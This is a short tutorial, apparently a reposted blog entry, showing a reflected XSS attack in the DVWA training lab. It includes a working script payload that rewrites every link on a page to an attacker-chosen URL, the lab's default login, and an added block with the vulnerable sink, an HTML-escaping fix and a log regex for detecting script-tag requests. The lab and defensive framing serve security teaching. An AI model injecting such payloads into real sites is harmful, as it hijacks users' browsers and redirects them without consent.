XX attack - reflective XSS attack hijacking user browser
2022-07-01 08:08:00 【Cwillchris】
Let's build a reflected XSS attack and carry it to the vulnerable page. It could also be run directly inside DVWA, but we constructed a somewhat more complex environment for demonstration purposes.
<script>
// Runs once the page has finished loading.
window.onload = function() {
    // Collect every <a> element on the page.
    var link = document.getElementsByTagName("a");
    // Point each link at the attacker-chosen URL.
    for (var j = 0; j < link.length; j++) {
        link[j].href = "http://www.baidu.com";
    }
}
</script>
JavaScript code analysis: window.onload fires when the web page has loaded and executes the anonymous function.
Its functionality: document.getElementsByTagName gets all of the a elements and stores them in the link array; a for loop then replaces the href of every element in the array with the malicious URL.
Open the Chrome browser; we test the effect on the reflected XSS page.
Log in at http://192.168.98.66/DVWA-master/login.php with user name admin and password password, then change the security level to low.
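As an added example (not code from the original post or from DVWA), the following shows the reflected sink at DVWA's low level beside its hardened form, and a simple access-log check for the kind of request used above. The `name` parameter, the `escapeHtml` helper and the log lines are assumptions or constructed samples, not taken from the page.

```javascript
// Added example, not part of the original post. The `name` parameter, the
// helpers and the log lines below are assumptions / constructed samples.

// The post's payload, as a single URL-parameter value.
const PAYLOAD =
  '<script>window.onload=function(){var link=document.getElementsByTagName("a");' +
  'for(var j=0;j<link.length;j++){link[j].href="http://www.baidu.com";}}</script>';

// Vulnerable sink: the parameter is concatenated straight into the HTML response.
function renderVulnerable(name) {
  return '<pre>Hello ' + name + '</pre>';
}

// Fix: HTML-encode the metacharacters so the browser treats the input as text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(name) {
  return '<pre>Hello ' + escapeHtml(name) + '</pre>';
}

// True when the response still carries an executable <script> element.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Detection: flag access-log requests whose query string decodes to a script
// tag or an on*= handler. Constructed sample lines in combined log format.
const SAMPLE_LOG = [
  '192.168.98.1 - - [01/Jul/2022:08:08:00 +0800] "GET /DVWA-master/vulnerabilities/xss_r/?name=Alice HTTP/1.1" 200 1832',
  '192.168.98.1 - - [01/Jul/2022:08:08:05 +0800] "GET /DVWA-master/vulnerabilities/xss_r/?name=%3Cscript%3Ewindow.onload%3Dfunction()%7B%7D%3C%2Fscript%3E HTTP/1.1" 200 1901',
];

function suspiciousRequests(lines) {
  const hits = [];
  for (const line of lines) {
    const m = line.match(/"(?:GET|POST) (\S+) HTTP/);
    if (!m) continue;
    let path;
    try { path = decodeURIComponent(m[1]); } catch (e) { path = m[1]; }
    if (/<script\b|\bon\w+\s*=/i.test(path)) hits.push(line);
  }
  return hits;
}
```

Output encoding at the sink is the fix; the log check only helps you spot attempts after the fact and will miss encodings it does not decode.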